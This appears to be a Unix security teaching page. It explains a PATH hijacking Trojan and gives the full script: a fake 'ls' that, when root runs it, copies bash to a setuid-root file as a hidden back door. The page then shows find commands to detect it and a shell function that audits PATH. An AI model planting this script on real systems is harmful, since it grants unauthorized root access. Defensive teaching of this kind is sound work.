Example of a Trojan


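  • Assume root has PATH set as follows: PATH=.:$PATH

  • A hacker puts the script below in /tmp and names it ls.

  • When root changes into /tmp and executes ls, the shell finds ./ls first (because "." is searched before the system directories), and the script creates a back door for the hacker.

  • When a user executes /tmp/.sh -p, he becomes root.
  • The script (installed as /tmp/ls):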
    #!/bin/sh
    
    who=`whoami`
    
    # check if I am the root:
    
    if [ "$who" = "root" ]
    then
    cp /bin/bash .sh
    chmod 4755 .sh
    /bin/rm ls
    fi
    
    /bin/ls $*
    

  • This Trojan can be found with the find command, which lists set-uid and set-gid files:
    
    find /tmp -type f -perm /u=s,g=s -ls
    
    or
    
    find /tmp -type f -perm /6000 -ls
    
  • Very often, Trojans come with new software. Verify developers' signatures using checksums or GPG/PGP tools.
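
An added example, not part of the original page: a POSIX shell function that audits a PATH value for the weakness the Trojan above depends on (a "." or empty entry) and, going slightly beyond the page, for relative entries and group- or world-writable directories. The function name audit_path and its output labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page).
# audit_path PATHSTRING
#   Prints one finding per line for every unsafe element of PATHSTRING.
#   Returns 0 if the value is clean, 1 if anything was flagged.
# Usage: audit_path "$PATH"
audit_path() {
    findings=0
    # Append ':' so every element, including a trailing empty one, ends in ':'.
    rest="$1:"
    while [ -n "$rest" ]; do
        dir=${rest%%:*}     # text before the first ':'
        rest=${rest#*:}     # text after the first ':'
        case "$dir" in
            "")
                # A leading, trailing or doubled ':' means the current directory.
                echo "EMPTY entry (treated as current directory)"
                findings=1 ;;
            .)
                echo "DOT entry: ."
                findings=1 ;;
            /*)
                # Absolute directory: anyone who can write to it can plant
                # a file named like a system command.
                if [ -d "$dir" ]; then
                    # -L follows symlinks such as /bin -> usr/bin.
                    # Mode string: char 6 is group write, char 9 is other write.
                    case "$(ls -ldL "$dir")" in
                        ?????w*|????????w*)
                            echo "WRITABLE by group/other: $dir"
                            findings=1 ;;
                    esac
                fi ;;
            *)
                # Relative entries resolve against whatever directory you are in.
                echo "RELATIVE entry: $dir"
                findings=1 ;;
        esac
    done
    return $findings
}
```

Run it from root's shell start-up files or a periodic check; any output means a command typed in a shared directory such as /tmp may not be the system binary.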